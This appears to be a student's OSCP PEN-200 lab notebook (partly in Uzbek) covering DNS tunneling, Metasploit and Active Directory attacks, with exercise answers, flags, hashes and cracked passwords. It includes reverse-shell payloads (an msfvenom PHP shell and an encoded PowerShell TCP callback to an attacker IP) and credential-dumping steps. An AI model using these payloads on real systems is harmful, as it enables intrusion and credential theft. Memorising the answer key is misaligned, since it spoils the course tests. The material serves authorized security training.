Answer
OS{ea49525b348f0755dff9c2d6c3cf2bff}
View hints
no hints
Command
offsecdan file yuklab olib executable qldik, va bizdan chise dasturini yuklab oluvchi POC payloadini yukladik
apache log filedan bizdan olganini check qildik
OSCP PEN-200 251
chiselni 8008 portda serve qildik
trafikni ko’rish uchun 8008 ga tcpdump ishga tushirdik
bizga tunnel ochib beruvchi POC payloadini yukladik
chiseldan listen qivotganini kordik
bizga trafik kelganini kordik
proxychains conf ga bizdan chisel ochgan listen qivotgan ip va portni yozdik
OSCP PEN-200 252
va proxychaindan foydalanib , boyagi binary fileni PGdatabase ip sini yozib listen qivotgan portini yozib ishlatdik , va bizga flag berdi
19.2.1. DNS Tunneling Fundamentals
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
Tunneling Through Deep Packet Inspection - DNS Tunneling Fundamentals - VM Group
Labs
1. Follow the steps in this section. From CONFLUENCE01 or PGDATABASE01, make a TXT record request for
give-me.cat-facts.internal, using MULTISERVER03 as the DNS resolver. What's the value of the TXT record?
Answer
OS{71f9e43c638d50e77166087c68e0bfb6}
View hints
HINT
1. To obtain the initial shell on CONFLUENCE01, refer to previous module's "Setting up the Lab Environment"
section.
2. Examine the command provided in listing 29 and make the necessary updates to the desired TXT record.
Command
reverse shell olsih uchun listen qildim
POC payloadini yuklab, ssh service ni yoqdm
reverse shell olganimdan keyin ssh remote port tunneling qildim
OSCP PEN-200 253
tunnel yaralganini check qildim
database adminga ulandim
feline ga ulandm, dnsmasq,conf ni o’qidm
va uni tozalash uchun shu commandni amalga oshirdm
OSCP PEN-200 254
ssh orqali feline ga yana bitta session yaratib ipsini interfaceni check qldm, va shu interfacega listening qildim tcpdump orqali traficni
check qilish uchun
OSCP PEN-200 255
pgdatabase dan resolvctl status check qildim
nslookup orqali bizdan soragan dnsni check qildim
OSCP PEN-200 256
va feline dagi lsiten qivotgan tcp dump orqali kelgan traficni check qldm
va yana nslookup orqali txt recordni oldim
19.2.2. DNS Tunneling with dnscat2
Resources
Some of the labs require you to start the target machine(s) or download the file(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
dnscat_exercise_client
200/extras/tunneling/4d423822e5645d068e2dfc0ce68b8002-dnscat_exercise_client
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
dnscat_exercise_client_aarch64
200/extras/tunneling/233b71de0eba60ababb004238b49d18e-dnscat_exercise_client_aarch64
Tunneling Through Deep Packet Inspection - DNS Tunneling with dnscat2 - VM Group
Labs
1. Follow the steps in this section to set up the dnscat2 server on FELINEAUTHORITY, and execute the dnscat2 client on
PGDATABASE01. Download the
dnscat_exercise_client from the Resources section ro your Kali machine. If you're running the aarch64 build of Kali,
download the dnscat_exercise_client_aarch64 binary instead. Set up a port forward with dnscat2 which allows you to
run the binary against the server running on port 4646 on HRSHARES.
Note: the source files used to build the client binaries can be downloaded from
/exercises/client_source.zip.
Answer
OS{3e0a11d884a53ced9479fbead6312971}
OSCP PEN-200 257
View hints
HINT
1. To obtain the shell on CONFLUENCE01, refer to previous module's "Setting up the Lab Environment" section.
2. Use the command in listing 37, making sure it's set to 0.0.0.0, enabling access from your Kali machine.
Command
reverse shell olish uchun listen qilamiz
POC payloadini yuklab reverse shell olamiz
reverse shell olganimizdan keyin pgdatabasenin ssh portiga ssh remote port tunneling qilamiz
pgdatabase ga ulanb, dnscat ning ichidan feline =.corp ni nslookup qiolamz
OSCP PEN-200 258
feline ga ulanib
tcpdumpda 53 portni listen qilamiz trafic ni analyze qlish uchun
shu commandlani amalga oshirib
OSCP PEN-200 259
dnscat2 serverini yaratib, qancha windows borligini ko’ramiz, va pgdatabsening windowiga kiramiz
pgdatabasedan dnscatni ishga tushiramiz feline.corp argumetn sifatida berib, va session yaralganidan keyin
OSCP PEN-200 260
listen qivotgan terminalmzdan traficlani ko’ramiz
pgdatabase windowidan listen qilamiz
binary file yuklab olib uni executable qilamiz
va flagni topamiz
20. The Metasploit Framework
20.1.1. Setup and Work with MSF
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
The Metasploit Framework - Setup and Work with MSF - VM #1
Labs
1. What command creates and initializes the MSF database?
Answer
sudo msfdb init
View hints
no hints
Command
OSCP PEN-200 261
2. Start VM #1 and follow the steps from this section to perform a Nmap scan within Metasploit. What is the command to
display all services from discovered hosts with port number 445?AnswerVerify
Answer
services -p 445
View hints
no hints
Command
20.1.2. Auxiliary Modules
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
The Metasploit Framework - Auxiliary Modules - VM Group 1
Labs
1. Once VM Group 1 is started, follow the steps outlined in this section. Log in to VM #1 (BRUTE) via SSH and find the
flag in the
george user's home directory.
Answer
OSCP PEN-200 262
OS{cef437fc8c1377b78dfdf7dd77ba3640}
View hints
HINT
Repeat the steps in this learning unit. Note: The SSH is running on port 2222 therefore, you need to specify the port
while doing SSH with "-p 2222".
Command
ssh auxi.. qdiramz, va 16 chini ishlatamiz
optionlarini check qlib, ularni to’ldiramiz
OSCP PEN-200 263
va run qlib pass topib sshdan flagni olamiz
20.1.3. Exploit Modules
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
The Metasploit Framework - Exploit Modules - VM #1
Labs
1. Follow the steps from this section and launch the exploit module to get an interactive shell on VM #1. Enter
pwd after the session is spawned and enter the current directory as answer.
Answer
/usr/bin
View hints
no hints
Command
apache 2.4.49 uchuin exploit qdiramz, va 0 chisini ishlatamiz
OSCP PEN-200 264
uni optionlarini ko’rib, peyload o’rnatamiz, va optionlarini ko’ramiz
OSCP PEN-200 265
optionlarini o’rnatamiz, va run qilamiz, 2chi session ga o’tib pwd commandini amalga oshiramiz
20.2.1. Staged vs Non-Staged Payloads
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
The Metasploit Framework - Staged vs Non-Staged Payloads - VM #1
Labs
1. Follow the steps outlined in this section to obtain a Metasploit session with a staged payload. Which character is used
in Metasploit to denote whether a payload is staged or not?
Answer
View hints
1HINT
Listing 32 shows us the payload we used before at index 20. In Metasploit, the "/" character is used to denote
whether a payload is staged or not, so shell_reverse_tcp at index 20 is not staged, whereas shell/reverse_tcp at
index 15 is.
Command
OSCP PEN-200 266
2. Activate the module exploit/multi/http/apache_normalize_path_rce in Metasploit and list all compatible payloads. Find
a 32bit staged reverse TCP command shell payload for Linux and enter its full name as answer.
Answer
payload/linux/x86/shell/reverse_tcp
View hints
HINT
Use the command provided in listing 32 to list the available payloads after selecting the exploit module.
Command
show payloads
20.2.2. Meterpreter Payload
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
The Metasploit Framework - Meterpreter Payload - VM #1
Labs
1. Follow the steps from this section and launch the exploit module with the Meterpreter payload
payload/linux/x64/meterpreter_reverse_https. Once a session is spawned, use the search command within the
Meterpreter command prompt and search for a file named passwords. Display the output of this file to obtain the flag.
Answer
OSCP PEN-200 267
OS{89c8e776ea707cac1714797e35d15ff0}
View hints
HINT
Ensure that disable SSL as the service is running on port 80 if you face issues with the exploit. (i.e. set SSL false)
Command
sudo msfconsole
use exploit/multi/http/apache_normalize_path_rce
set payload payload/linux/x86/meterpreter_reverse_tcp
set rhosts <IP>
set rport <PORT>
set ssl false
set lhost <OWN_IP>
show options
run qilib reverse shell olamiz
20.2.3. Executable Payloads
Labs
1. Follow the steps from this section and use msfvenom to create a Windows binary with a staged TCP reverse shell
payload. Start a multi/handler within Metasploit to receive the staged reverse shell from VM #1 once you execute the
OSCP PEN-200 268
executable file on the system. Enter the command to list all payloads of msfvenom.
Answer
msfvenom -l payloads
View hints
no hints
Command
2. Use msfvenom to create a PHP web shell (bind or reverse shell), rename the PHP file extension to .pHP (as we did in
the Module "Common Web Application Attacks" in the section "Using Executable Files"), and upload it to VM #2 to
obtain an interactive shell. The flag is located in C:\xampp\passwords.txt.
Answer
OS{9166a44f893a655b21e03256974ee1bb}
View hints
HINT
1. Enumerate directories with a wordlist such as megabeast.txt.
2. Inspect the directories for file upload.
3. Create a msfvenom payload php/reverse_php, set the extension to .pHP .
4. Upload and access it from the designated location to have shell.
Command
msfvenom -p php/reverse_php LHOST=192.168.45.182 LPORT=443 -f raw > shell.pHP
OSCP PEN-200 269
OSCP PEN-200 270
20.3.1. Core Meterpreter Post-Exploitation Features
The Metasploit Framework - Core Meterpreter Post-Exploitation Features - VM #1
Labs
1. Follow the steps from this section to migrate to the
OneDrive.exe process of user offsec. Then, use the Meterpreter post-exploitation feature getenv to display the value of
the environment variable Flag and enter it as answer to this exercise.
Answer
thisistheanswertothequestion
View hints
HINT
1. Repeat the steps in this learning unit.
2. Before attempting to access the flag, please note that you need to migrate the process to OneDrive.exe, as shown
in listing 62 and listing 63.
3. You can use the "getenv Flag" command to retrieve the flag.
Command
OSCP PEN-200 271
msfvenomdan foydalanb payload yasaymiz
metasploit ishga rushirib exploit yuklab, payloadni yuklab, lport,lhost larni kiritb run qilamiz
met.exe bor joyda python web server serve qilamiz
OSCP PEN-200 272
nc dan foydalanb targetimizga ulanamiz, va iwr commandi orqali biz met.exe ni yuklab olamiz
yuklab olinganini check qildik
met.exe ni ishga tushiramiz
OSCP PEN-200 273
bizga meterpreter shell ochildi
shell commandi orqali interactive shellni ishlatib priv. larini chekc qilamiz, va bizga kerakli privelege bor ekan
uid sini check qilib systemini nt authority useri orqali qolga kiritamiz
OSCP PEN-200 274
savolda aytilganidek onedriveni migrate qilamiz
onedrive pid sini oib
migrate qildiik, va getenv commandi orqali Flag deb nomlanuvchi envirenmontni qiymatini javob shaklida kiritamiz
20.3.2. Post-Exploitation Modules
OSCP PEN-200 275
The Metasploit Framework - Post-Exploitation Modules - VM #1
Labs
1. Follow the steps from this section and use Kiwi to retrieve the NTLM hash of user
offsec. Enter it as answer to this question.
Answer
1c3fb240ae45a2dc5951a043cf47040e
View hints
no hints
Command
OSCP PEN-200 276
OSCP PEN-200 277
OSCP PEN-200 278
OSCP PEN-200 279
2. Search for a post-exploitation module that enumerates the Windows Hosts file and launch it against an active session
on VM #1. What is the domain name of the only entry of this file?
Answer
secretstaging-internal.com
View hints
HINT
You may want to utilize the "search" functionality to locate the right post-enumeration module once you gained
meterpreter shell after repeating the steps in this learning unit. (ie. search hostfile)
Command
OSCP PEN-200 280
yuqoridagi labni davomi, hech narsani to’htatmagan holda davom etamiz
20.3.3. Pivoting with Metasploit
The Metasploit Framework - Pivoting with Metasploit - VM Group 1
Labs
1. Follow steps from this section and find the flag on VM #2 (ITWK02) on the desktop of user
luiza.
Answer
OS{afac963e53a4b075b8adf14a7427c643}
View hints
OSCP PEN-200 281
HINT
Repeat the steps in this learning unit, adjusting IP addresses based on your actual exercise VM IPs.
Command
LEKIN BIZGA 2 CHI HOSTNI IP SI 192.168.183.200 BERILGAN
OSCP PEN-200 282
OSCP PEN-200 283
OSCP PEN-200 284
20.4.1. Resource Scripts
The Metasploit Framework - Resource Scripts - VM #1
The Metasploit Framework - Capstone Exercise - VM Group 1
Labs
1. Follow the steps outlined in this section and use a resource script to set up a multi/handler. Obtain a Meterpreter
session from VM #1. In addition, review the provided resource scripts. What is the command line option of
msfconsole to specify the use of a resource script?
Answer
OSCP PEN-200 285
-r
View hints
HINT
Refer to listing 91 to see the command line option required for leveraging a resource script.
Command
2. The provided resource script portscan.rc by Metasploit scans various ports in the default configuration. What is the
number of the first port?
Answer
7
View hints
HINT
1. Use the command provided in listing 94 to locate the path for the default resource scripts that MSF provides.
2. By combining this path with 'portscan.rc' you can access the file, review the code, and determine the first port
that was used.
Command
OSCP PEN-200 286
3. Capstone Exercise: Use the methods and techniques from this Module to enumerate VM Group 1. Get access to both
machines and find the flag. Once the VM Group is deployed, please wait two more minutes for one of the web
applications to be fully initialized.
Answer
OS{85a941a22d871c3d50b69c9bb538235c}
View hints
no hints
Command
OSCP PEN-200 287
OSCP PEN-200 288
OSCP PEN-200 289
OSCP PEN-200 290
21. Active Directory Introduction and Enumeration
21.2.1. Active Directory - Enumeration Using Legacy Windows Tools
Active Directory Enumeration - Enumeration Using Legacy Windows Tools - VM Group 1
Active Directory Enumeration - Enumeration Using Legacy Windows Tools - VM Group 2
Labs
1. Which type of server acts as the core and hub of a domain hosted in Active Directory?
Answer
Domain Controller
View hints
no hints
Command
no commands
2. Start VM Group 1 and log in to CLIENT75 as stephanie. Use net.exe to enumerate the corp.com domain. Which user
is a member of the Management Department group?
Answer
jen
View hints
OSCP PEN-200 291
HINT
Make sure that you are specifying the /domain in the command since we are querying the domain.
Command
3. Start VM Group 2 and log in to CLIENT75 as stephanie. Use net.exe to enumerate the users and groups in the
modified corp.com domain to obtain the flag.
Answer
OS{854c8c3b7caa14850dcc352caad7ac51}
View hints
HINT
Make sure that you are specifying the /domain in the command since we are querying the domain.
Command
OSCP PEN-200 292
21.2.2. Enumerating Active Directory using PowerShell and .NET Classes
Active Directory Enumeration - Enumerating Active Directory using PowerShell - VM Group 1 + 192.168.224.70
Labs
1. Start VM Group 1 and repeat the steps outlined in this section to build the script. Use the script to dynamically obtain
the LDAP path for the
corp.com domain. Which property in the domain object shows the primary domain controller for the domain?
Answer
PdcRoleOwner
View hints
HINT
1. Open PowerShell as Stephanie and execute (code extracted from listing 8) and take note of each variable.
2. Seek a property in the domain object related to the primary domain controller's role.
Command
2. Which set of COM interfaces gives us an LDAP provider we can use for communication with Active Directory?
Answer
OSCP PEN-200 293
ADSI
View hints
no hints
Command
21.2.3. Adding Search Functionality to our Script
Active Directory Enumeration - Adding Search Functionality to our Script - VM Group 1
Active Directory Enumeration - Adding Search Functionality to our Script - VM Group 2
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Follow the steps outlined in this section to add search functionality to the script. Encapsulate the script
functionality into a function and repeat the enumeration process. Which .NET class makes the search against Active
Directory?
Answer
DirectorySearcher
View hints
no hints
Command
2. Start VM Group 2 and log in to CLIENT75 as stephanie. Use the newly developed PowerShell script to enumerate the
domain groups, starting with Service Personnel. Unravel the nested groups, then enumerate the attributes for the last
direct user member of the nested groups to obtain the flag.
Answer
OS{63190308a130d49bc6252be66845147e}
View hints
HINT
1. The script to use is extracted from listing 26.
2. Query for the group category object and providing the cn.
3. List the properties and find the flag in the description of the right user after enumerating all the nested group
members.
Command
OSCP PEN-200 294
21.2.4. AD Enumeration with PowerView
Active Directory Enumeration - AD Enumeration with PowerView - VM Group 1
Active Directory Enumeration - AD Enumeration with PowerView - VM Group 2
OSCP PEN-200 295
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Import the PowerView script to memory and repeat the enumeration steps outlined in this section. Which
command can we use with PowerView to list the domain groups?
Answer
Get-NetGroup
View hints
no hints
Command
2. Start VM Group 2 and log in to CLIENT75 as stephanie. Use PowerView to enumerate the modified corp.com domain.
Which new user is a part of the Domain Admins group?
Answer
nathalie
View hints
HINT
Enumerate the whencreated filter of the get-netuser command and check for the newly created user.
Command
OSCP PEN-200 296
3. Continue enumerating the corp.com domain in VM Group 2. Enumerate which Office the user fred is working in to
obtain the flag.
Answer
OS{5fe51ab2dd923ad4d0705b35ccd31062}
View hints
no hints
Command
21.3.1. Enumerating Operating Systems
Active Directory Enumeration - Enumerating Operating Systems - VM Group 1
Active Directory Enumeration - Enumerating Operating Systems - VM Group 2
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Repeat the PowerView enumeration steps as outlined in this section. What is the DistinguishedName for the
WEB04 machine?
Answer
CN=web04,CN=Computers,DC=corp,DC=com
View hints
no hints
OSCP PEN-200 297
Command
2. Continue enumerating the operating systems in VM Group 1. What is the exact operating system version for FILES04?
Make sure to provide both the major and minor version number in the answer.
Answer
10.0 (20348)
View hints
no hints
Command
3. Start VM Group 2 and log in to CLIENT75 as stephanie. Use PowerView to enumerate the operating systems in the
modified corp.com domain to obtain the flag.
Answer
OS{7bc2cf30c2be36d959271b7a3bf6b678}
View hints
no hints
Command
OSCP PEN-200 298
21.3.2. Getting an Overview - Permissions and Logged on Users
Active Directory Enumeration - Getting an Overview - VM Group 1
Active Directory Enumeration - Getting an Overview - VM Group 2
Labs
1. What registry key does
NetSessionEnum rely on to discover logged on sessions?
Answer
SrvsvcSessionInfo
View hints
HINT
Refer to the third paragraph located directly above listing 49 in this particular section.
Command
2. Start VM Group 1 and log in to CLIENT75 as stephanie. Repeat the enumeration steps outlined in this section to find
the logged on sessions. Which service must be enabled on the remote machine to make it possible for PsLoggedOn to
enumerate sessions?
Answer
Remote Registry
View hints
HINT
Check this section and see what limitation PsLoggedOn relies on in order to scan the associated key.
OSCP PEN-200 299
Command
3. Start VM Group 2 and log in to CLIENT75 as stephanie. Find out which new machine stephanie has administrative
privileges on, then log in to that machine and obtain the flag from the Administrator Desktop.
Answer
OS{94e5d64ca753ff5c4f585bee0153e375}
View hints
HINT
1. Check if PowerShell needs to have the execution policy bypassed.
2. The command to use is shown in listing 45 in this section.
3. It is possible to use RDP to gain access to the machine that has been identified.
Command
OSCP PEN-200 300
21.3.3. Enumeration Through Service Principal Names
Active Directory Enumeration - Enumeration Through Service Principal Names - VM Group 1
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Repeat the enumeration steps outlined in this section to enumerate the Service Account. What is the name of
the unique service identifier that is used to associate to a specific service in Active Directory?
Answer
SPN
View hints
HINT
1. This section discusses how various applications integrate with Active Directory.
2. Look for a term that refers to a unique identifier for service instances in Active Directory.
Command
21.3.4. Enumerating Object Permissions
Active Directory Enumeration - Enumerating Object Permissions - VM Group 1
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Repeat the enumeration steps outlined in this section to get an understanding for the object permissions.
What kind of entries makes up an ACL?
Answer
ACEs
View hints
HINT
1. Recall the section about the components that make up an Access Control List in Active Directory.
2. Find the acronym representing individual entries in an ACL defining access permissions.
Command
OSCP PEN-200 301
2. What is the most powerful ACL we can have on an object in Active Directory?
Answer
GenericAll
View hints
HINT
1. Revisit the section discussing ACLs on objects in Active Directory and identify the term that signifies complete
control.
2. This type of ACL allows a user or group to perform all kinds of operations on the object.
Command
21.3.5. Enumerating Domain Shares
Active Directory Enumeration - Enumerating Domain Shares - VM Group 1
Active Directory Enumeration - Enumerating Domain Shares - VM Group 2
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Repeat the enumeration steps outlined in this section and view the information in the accessible shares.
What is the hostname for the server sharing the SYSVOL folder in the corp.com domain?
Answer
dc1.corp.com
View hints
no hints
Command
OSCP PEN-200 302
2. Start VM Group 2 and log in to CLIENT75 as stephanie. Use PowerView to locate the shares in the
modified corp.com domain and enumerate them to obtain the flag.
Answer
OS{6a514936cb4d49d4a05f1991382ee179}
View hints
no hints
Command
21.4.1. Collecting Data with SharpHound
Active Directory Enumeration - Collecting Data with SharpHound - VM Group 1
OSCP PEN-200 303
Labs
1. Start VM Group 1 and log in to CLIENT75 as
stephanie. Gather the domain data with SharpHound as outlined in this section. Which function can we use with
SharpHound to see changes happening in the domain over a longer period of time?
Answer
Loop
View hints
HINT
1. Reflect on the part of the section that discusses SharpHound’s ability to run repeated queries over a duration.
2. The answer is a synonym for continuous or repetitive action, typically used to describe a function that repeats in
a cycle.
Command
2. Which syntax in SharpHound allows us to set a password on the resulting .zip file?
Answer
ZipPassword
View hints
HINT
1. Refer to the SharpHound documentation, particularly the section detailing command-line arguments or syntax for
securing output files.
2. Look for a syntax option that is associated with securing or encrypting a zipped data file.
Command
OSCP PEN-200 304
how to get via zip file all information from AD
21.4.2. Analysing Data using BloodHound
Active Directory Enumeration - Bloodhound - VM Group 1
Active Directory Enumeration - Capstone - VM Group 2
Labs
1. If you have not collected data using SharpHound at this point, start VM Group 1 and perform the data collection.
Transfer the .zip file generated with SharpHound to Kali Linux. Start BloodHound and repeat the analysis steps outlined
in this section to find the promising attack path. Which service does BloodHound rely on to display the data in graphs?
Answer
OSCP PEN-200 305
Neo4j
View hints
HINT
Refer back to listing 80 in this section, which mentions a service used in conjunction with BloodHound.
Command
2. Search for the Management Department group in BloodHound and use the Node Info tab to have a look at
the Inbound Control Rights for the group. Who is currently the owner of the Management Department group?
Answer
DOMAIN ADMINS
View hints
HINT
1. Focus on finding the node that implies possession or ownership within the Inbound Control Rights.
2. The answer is a common name for a group that usually has wide-ranging administrative privileges across the
domain.
Command
OSCP PEN-200 306
OSCP PEN-200 307
OSCP PEN-200 308
OSCP PEN-200 309
3. Capstone Exercise: Start VM Group 2 and log in as stephanie to CLIENT75. From CLIENT75, enumerate the object
permissions for the domain users. Once weak permissions have been identified, use them to take full control over the
account and use it to log in to the domain. Once logged in, repeat the enumeration process using techniques shown in
this Module to obtain the flag.
Answer
OS{a23475b017b86442a14e6244f51ff8fb}
View hints
HINT
1. Bloodhound data might show Stephanie has a first-degree object control.
2. Powerview could also be used to find any exciting domain Acl Stephanie has.
3. Does the new user have local admin access?
Command
OSCP PEN-200 310
OSCP PEN-200 311
OSCP PEN-200 312
22. Attacking Active Directory Authentication
22.1.1. NTLM Authentication
Labs
1. What is the name of the cryptographic hash function a computer calculates from the user's password?
Answer
NTLM
View hints
HINT
1. Recall the first step in the password calculation process.
2. The answer is a four-letter acronym related to hashing.
Command
OSCP PEN-200 313
2. What kind of hashing algorithm is NTLM?
Answer
fast-hashing
View hints
HINT
1. Note the characteristics of NTLM regarding password cracking.
2. Identify the term describing NTLM's hashing speed & security.
Command
OSCP PEN-200 314
22.1.2. Kerberos Authentication
Labs
1. What is the name of the request sent when a user logs into their AD-joined machine?
Answer
AS-REQ
View hints
HINT
After reviewing figure 2 in this section, pay particular attention to the next paragraph.
Command
OSCP PEN-200 315
3. What is the main authentication protocol used by Active Directory?
Answer
Kerberos
View hints
no hints
Command
3. What is the short name of the request sent by the client that encrypts the TGT along with the current user, the target
resource, and the timestamp?
Answer
TGS-REQ
View hints
OSCP PEN-200 316
HINT
Ticket Granting Service Request (TGS-REQ) packet that consists of the current user and a timestamp encrypted
with the session key, the name of the resource, and the encrypted TGT.
Command
22.1.3. Cached AD Credentials
Attacking Active Directory Authentication - Cached AD Credentials - VM Group 1
Labs
1. Follow the steps outlined in this section to retrieve the cached NTLM hash. Furthermore, execute the
dir command and list the cached tickets. What is the Mimikatz command to dump hashes for all users logged on to the
current system?
Answer
sekurlsa::logonpasswords
View hints
HINT
1. Launch PowerShell command prompt with elevated privileges.
2. The command you seek is utilized for dumping logon passwords.
3. Use the command provided in listing 3 to dump all the credentials of all logged-on users.
Command
OSCP PEN-200 317
22.2.1. Password Attacks
Attacking Active Directory Authentication - Password Attacks - VM Group 1
Labs
1. Follow the steps outlined in this section and spray the password
Nexus123! with the three different tools introduced in this section. What is the minimum password length required in the
target domain?
Answer
View hints
HINT
Use the command provided in listing 6 in order to find the minimum required password length of the domain.
Command
OSCP PEN-200 318
2. Spray the credentials of pete against all domain joined machines with crackmapexec. On which machine is pete a
local administrator?
Answer
CLIENT76
View hints
HINT
1. Refer to listing 12 to see what the output looks like when the credentials have administrative privileges.
2. You need to use "pete" as the user against all the target machines not "dave".
Command
OSCP PEN-200 319
22.2.2. AS-REP Roasting
Attacking Active Directory Authentication - AS-REP Roasting - VM Group 1
Attacking Active Directory Authentication - AS-REP Roasting - VM Group 2
Labs
1. Follow the steps outlined in this section to obtain the plaintext password of
dave on Windows and Kali by performing AS-REP Roasting. What is the correct Hashcat mode to crack AS-REP
hashes?
Answer
18200
View hints
HINT
Refer to listing 15 to obtain the hashcat mode against AS-REP hashes.
Command
2. Once VM Group 2 is started, the domain corp.com has been slightly modified. Use the techniques from this section to
obtain another plaintext password by performing AS-REP Roasting and enter it as answer to this exercise.
Answer
Summerland1
View hints
HINT
Use the command provided in listing 14 to perform AS-REP Roasting and crack it as shown in listing 16.
Command
OSCP PEN-200 320
22.2.3. Kerberoasting
Attacking Active Directory Authentication - Kerberoasting - VM Group 1
Attacking Active Directory Authentication - Kerberoasting - VM Group 2
Labs
1. Follow the steps outlined in this section to obtain the plaintext password of
iis_service on Windows and Kali by performing Kerberoasting. What is the correct Hashcat mode to crack TGS-REP
hashes?
Answer
13100
View hints
HINT
1. Make sure you are working on VM Group 1 to replicate the steps.
2. Refer to listing 20 to obtain the hashcat mode against TGS-REP hashes.
Command
OSCP PEN-200 321
2. Once VM Group 2 is started, the domain corp.com has been slightly modified. Use the techniques from this section to
obtain another plaintext password by performing Kerberoasting and enter it as answer to this exercise. To crack the
TGS-REP hash, create and utilize a rule file which adds a "1" to the passwords of rockyou.txt. To perform the attack,
you can use the user jeff with the password HenchmanPutridBonbon11.
Answer
MattLovesAutumn1
View hints
HINT
1. Use the command provided in listing 22 to perform Kerberoasting using jeff's hash, adjusting the third octet of the
IP based on your actual exercise VMs.
2. Once the hash has been retrieved, crack it with the command provided in listing 21.
Command
OSCP PEN-200 322
22.2.4. Silver Tickets
Attacking Active Directory Authentication - Silver Tickets - VM Group 1
Labs
1. Follow the steps outlined in this section to forge a silver ticket for
jeffadmin in order to access the web page located at http://web04. Review the source code of the page and find the
flag.
Answer
OS{806a8b81b899c9db199c265ce145deee}
View hints
HINT
1. Login to the CLIENT75 (192.168.x.75) machine using jeff user with xfreerdp.
2. Follow the steps in this learning unit.
3. To quickly find the flag, utilize "| findstr /i OS{" in addition to the command in listing 29.
Command
OSCP PEN-200 323
22.2.5. Domain Controller Synchronization
Attacking Active Directory Authentication - Domain Controller Synchronization - VM Group 1
OSCP PEN-200 324
Attacking Active Directory Authentication - VM Group 2
Attacking Active Directory Authentication - VM Group 3
Labs
1. Follow the steps outlined in this section to perform the dcsync attack to obtain the NTLM hash of the
krbtgt account. Enter the NTLM hash as answer to this question.
Answer
1693c6cefafffc7af11ef34d1c788f47
View hints
HINT
1. Ensure that you are working on VM Group 1 to replicate the steps.
2. Use the command provided in listing 30 to perform dcsync attack. However, in this specific exercise, our target is
the hash of the krbtgt account (corp\krbtgt).
Command
OSCP PEN-200 325
2. Capstone Exercise: Once VM Group 2 is started, the domain corp.com has been modified. Use the techniques from
this Module to obtain access to the user account maria and log in to the domain controller. To perform the initial
enumeration steps you can use pete with the password Nexus123!. You'll find the flag on the Desktop of the domain
administrator on DC1. If you obtain a hash to crack, create and utilize a rule file which adds nothing, a "1", or a "!" to the
passwords of rockyou.txt.
Answer
OS{a3b928627281409369cc404a8c4668a8}
View hints
HINT
1. Perform credential roasting on specific users within the DC.
2. Crack the hash using a custom rule with hashcat.
3. Spray the new credential across all machines using crackmapexec.
4. Use mimikatz to perform post-exploitation and try logging into DC1.
Command
OSCP PEN-200 326
OSCP PEN-200 327
OSCP PEN-200 328
3. Capstone Exercise: Once VM Group 3 is started, the domain corp.com has been modified. By examining leaked
password database sites, you discovered that the password VimForPowerShell123! was previously used by a domain
OSCP PEN-200 329
user. Spray this password against the domain users meg and backupuser. Once you have identified a valid set of
credentials, use the techniques from this Module to obtain access to the domain controller. You'll find the flag on the
Desktop of the domain administrator on DC1. If you obtain a hash to crack, reuse the rule file from the previous exercise.
Answer
OS{75e553ca010d5cac792e30d7921b5459}
View hints
HINT
1. Spray the given password with crackmapexec until we find a valid domain user.
2. Once a valid login is found, look for SPNs using impacket's "GetUserSPNs.py".
3. Crack the hash using the same rule in the previous exercise.
Command
OSCP PEN-200 330
OSCP PEN-200 331
23. Lateral Movement in Active Directory
23.1.1. WMI and WinRM
Lateral Movement in Active Directory - WMI and WinRM - VM Group 1
Lateral Movement in Active Directory - WMI and WinRM - VM Group 2
Labs
1. Launch VM Group 1 and repeat the steps discussed in this section. Which PowerShell cmdlet has been used to create
a WMI session?
Answer
New-Cimsession
View hints
HINT
1. Please refer to the paragraph right after listing 2 and listing 3 in this section to create a WMI session.
2. The answer does not contain any underscore.
Command
2. Launch VM Group 2 and once connected as jeff on client74 and try to move laterally to web04 in order to get the flag
located on the administrator's desktop.
Answer
OS{a81e858888f680e8b459e5915889ce93}
View hints
HINT
1. RDP to CLIENT74 as jeff using the password provided in the training library after powering up VM Group 2.
2. Follow the same steps outlined in listing 6 and listing 8, but keep in mind that this time, the objective is to gain
access to WEB04.
OSCP PEN-200 332
Command
import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.194",4444);$stream = $client.GetStre
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
OSCP PEN-200 333
23.1.2. PsExec
Lateral Movement in Active Directory - PsExec - VM Group 1
Lateral Movement in Active Directory - PsExec - VM Group 2
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which system folder (that will become a share name)
needs to be shared in order for PsExec to connect remotely?
Answer
ADMIN$
View hints
HINT
1. At the start of this learning unit, it's specified which system folder needs to be accessed. Note: When
reproducing the steps, you should avoid using the domain flag (-d) for RDP, as the user has local admin
privileges in this scenario.
Command
OSCP PEN-200 334
2. Start VM Group 2 and connect as the offsec user on client74. Then try to use PsExec to move laterally to web04 in
order to get the flag located on jen's desktop.
Answer
OS{026f5adfcdec25c1dae329fbf5261c9c}
View hints
HINT
1. RDP to Client74 with offsec user as a local administrator using the password provided in the training library.
2. Use jen's credentials and provided command in listing 15, to access web04, not FILES04.
Command
23.1.3. Pass the Hash
Lateral Movement in Active Directory - Pass the Hash - VM Group 1
Lateral Movement in Active Directory - Pass the Hash - VM Group 2
OSCP PEN-200 335
Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which TCP port needs to be enabled on the target
machine in order for the pass the hash technique to work?
Answer
445
View hints
HINT
